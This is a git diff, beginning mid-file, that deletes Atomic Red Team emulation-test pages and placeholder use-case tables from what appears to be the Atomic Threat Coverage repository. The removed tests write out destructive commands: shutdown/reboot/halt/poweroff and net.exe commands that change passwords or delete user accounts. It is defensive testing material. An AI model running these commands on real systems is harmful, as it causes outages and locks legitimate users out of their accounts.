-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-shutdown /r /t #{timeout}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Restart System via `shutdown` - macOS/Linux
-This test restarts a macOS/Linux system.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| timeout | Time to restart (can be minutes or specific time) | string | now|
-
-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
-
-```bash
-shutdown -r #{timeout}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Shutdown System via `shutdown` - macOS/Linux
-This test shuts down a macOS/Linux system using a halt.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| timeout | Time to shutdown (can be minutes or specific time) | string | now|
-
-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
-
-```bash
-shutdown -h #{timeout}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Restart System via `reboot` - macOS/Linux
-This test restarts a macOS/Linux system via `reboot`.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
-
-```bash
-reboot
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Shutdown System via `halt` - Linux
-This test shuts down a Linux system using `halt`.
-
-**Supported Platforms:** Linux
-
-
-
-
-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
-
-```bash
-halt -p
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Reboot System via `halt` - Linux
-This test restarts a Linux system using `halt`.
-
-**Supported Platforms:** Linux
-
-
-
-
-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
-
-```bash
-halt --reboot
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #8 - Shutdown System via `poweroff` - Linux
-This test shuts down a Linux system using `poweroff`.
-
-**Supported Platforms:** Linux
-
-
-
-
-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
-
-```bash
-poweroff
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #9 - Reboot System via `poweroff` - Linux
-This test restarts a Linux system using `poweroff`.
-
-**Supported Platforms:** Linux
-
-
-
-
-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
-
-```bash
-poweroff --reboot
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1531.md b/Atomic_Threat_Coverage/Triggers/T1531.md
deleted file mode 100644
index 093fe14..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1531.md
+++ /dev/null
@@ -1,103 +0,0 @@
-# T1531 - Account Access Removal
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1531)
-<blockquote>Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.
-
-Adversaries may also subsequently log off and/or reboot boxes to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Change User Password - Windows](#atomic-test-1---change-user-password---windows)
-
-- [Atomic Test #2 - Delete User - Windows](#atomic-test-2---delete-user---windows)
-
-
-<br/>
-
-## Atomic Test #1 - Change User Password - Windows
-Changes the user password to hinder access attempts. Seen in use by LockerGoga. Upon execution, log into the user account "AtomicAdministrator" with
-the password "HuHuHUHoHo283283".
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| user_account | User account whose password will be changed. | string | AtomicAdministrator|
-| new_password | New password for the specified account. | string | HuHuHUHoHo283283@dJD|
-| new_user_password | Password to use if user account must be created first | string | User2ChangePW!|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-net.exe user #{user_account} #{new_password}
-```
-
-#### Cleanup Commands:
-```cmd
-net.exe user #{user_account} /delete >nul 2>&1
-```
-
-
-
-#### Dependencies:  Run with `command_prompt`!
-##### Description: User account to change password of must exist (User: #{user_account})
-##### Check Prereq Commands:
-```cmd
-net user #{user_account} 
-```
-##### Get Prereq Commands:
-```cmd
-net user #{user_account} #{new_user_password} /add
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Delete User - Windows
-Deletes a user account to prevent access. Upon execution, run the command "net user" to verify that the new "AtomicUser" account was deleted.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| user_account | User account to be deleted. | string | AtomicUser|
-| new_user_password | Password to use if user account must be created first | string | User2DeletePW!|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-net.exe user #{user_account} /delete
-```
-
-
-
-
-#### Dependencies:  Run with `command_prompt`!
-##### Description: User account to delete must exist (User: #{user_account})
-##### Check Prereq Commands:
-```cmd
-net user #{user_account} 
-```
-##### Get Prereq Commands:
-```cmd
-net user #{user_account} #{new_user_password} /add
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Use_Cases/UC_0001_TESTUSECASE.md b/Atomic_Threat_Coverage/Use_Cases/UC_0001_TESTUSECASE.md
deleted file mode 100644
index 5e79983..0000000
--- a/Atomic_Threat_Coverage/Use_Cases/UC_0001_TESTUSECASE.md
+++ /dev/null
@@ -1,7 +0,0 @@
-| Title              | UC_0001_TESTUSECASE |
-|:-------------------|:--------------------|
-| **Use Case Name**  | TESTUSECASE |
-| **Description**    | Some text description here. It will be merged into one line.   |
-| **Data Needed**    |<ul><li>[DN_0001_4688_windows_process_creation](../Data_Needed/DN_0001_4688_windows_process_creation.md)</li><li>[DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)</li></ul> |
-| **Logging Policy** | <ul><li>[LP_0001_windows_audit_process_creation](../Logging_Policies/LP_0001_windows_audit_process_creation.md)</li><li>[LP_0002_windows_audit_process_creation_with_commandline](../Logging_Policies/LP_0002_windows_audit_process_creation_with_commandline.md)</li><li>[LP_0003_windows_sysmon_process_creation](../Logging_Policies/LP_0003_windows_sysmon_process_creation.md)</li></ul> |
-| **Detection Rule** | <ul><li>[SquiblyTwo](../Detection_Rules/win_bypass_squiblytwo.md)</li><li>[Cmdkey Cached Credentials Recon](../Detection_Rules/win_cmdkey_recon.md)</li><li>[CMSTP UAC Bypass via COM Object Access](../Detection_Rules/win_cmstp_com_object_access.md)</li><li>[CMSTP Execution](../Detection_Rules/sysmon_cmstp_execution.md)</li><li>[Exploit for CVE-2015-1641](../Detection_Rules/win_exploit_cve_2015_1641.md)</li><li>[Exploit for CVE-2017-0261](../Detection_Rules/win_exploit_cve_2017_0261.md)</li><li>[Dridex Process Pattern](../Detection_Rules/win_malware_dridex.md)</li></ul> |
\ No newline at end of file
diff --git a/Atomic_Threat_Coverage/Use_Cases/UC_0002_INITIALACCESS.md b/Atomic_Threat_Coverage/Use_Cases/UC_0002_INITIALACCESS.md
deleted file mode 100644
index 596d56a..0000000
--- a/Atomic_Threat_Coverage/Use_Cases/UC_0002_INITIALACCESS.md
+++ /dev/null
@@ -1,7 +0,0 @@
-| Title              | UC_0002_INITIALACCESS |
-|:-------------------|:--------------------|
-| **Use Case Name**  | Example Use Case to detect Initial Access |
-| **Description**    | Some text description here. It will be merged into one line.   |
-| **Data Needed**    |<ul><li>[DN_0001_4688_windows_process_creation](../Data_Needed/DN_0001_4688_windows_process_creation.md)</li><li>[DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)</li></ul> |
-| **Logging Policy** | <ul><li>[LP_0001_windows_audit_process_creation](../Logging_Policies/LP_0001_windows_audit_process_creation.md)</li><li>[LP_0002_windows_audit_process_creation_with_commandline](../Logging_Policies/LP_0002_windows_audit_process_creation_with_commandline.md)</li><li>[LP_0003_windows_sysmon_process_creation](../Logging_Policies/LP_0003_windows_sysmon_process_creation.md)</li></ul> |
-| **Detection Rule** | <ul><li>[Flash Player Update from Suspicious Location](../Detection_Rules/proxy_susp_flash_download_loc.md)</li><li>[Possible DNS Rebinding](../Detection_Rules/sysmon_possible_dns_rebinding.md)</li></ul> |
\ No newline at end of file
diff --git a/detection_rules/sigma b/detection_rules/sigma
index 5200f1f..514bd86 160000
--- a/detection_rules/sigma
+++ b/detection_rules/sigma
@@ -1 +1 @@
-Subproject commit 5200f1f85d9aa07c350942078c05d72e7908413a
+Subproject commit 514bd8657bdd2a5d96d13a7b22b42e08cce6ba33
diff --git a/response/atc_react b/response/atc_react
index 7d7c834..b7bd8ec 160000
--- a/response/atc_react
+++ b/response/atc_react
@@ -1 +1 @@
-Subproject commit 7d7c8349aafd68bc74d827c9a2649c702205fa2a
+Subproject commit b7bd8ec2b3cf3bf38c140aec46cb08a047e77311
diff --git a/triggers/atomic-red-team b/triggers/atomic-red-team
index 91d71a7..35ed42d 160000
--- a/triggers/atomic-red-team
+++ b/triggers/atomic-red-team
@@ -1 +1 @@
-Subproject commit 91d71a722e6795837fee2e550f432af29fb971b4
+Subproject commit 35ed42de922e0db1b16e49de1f3af02c12a7967b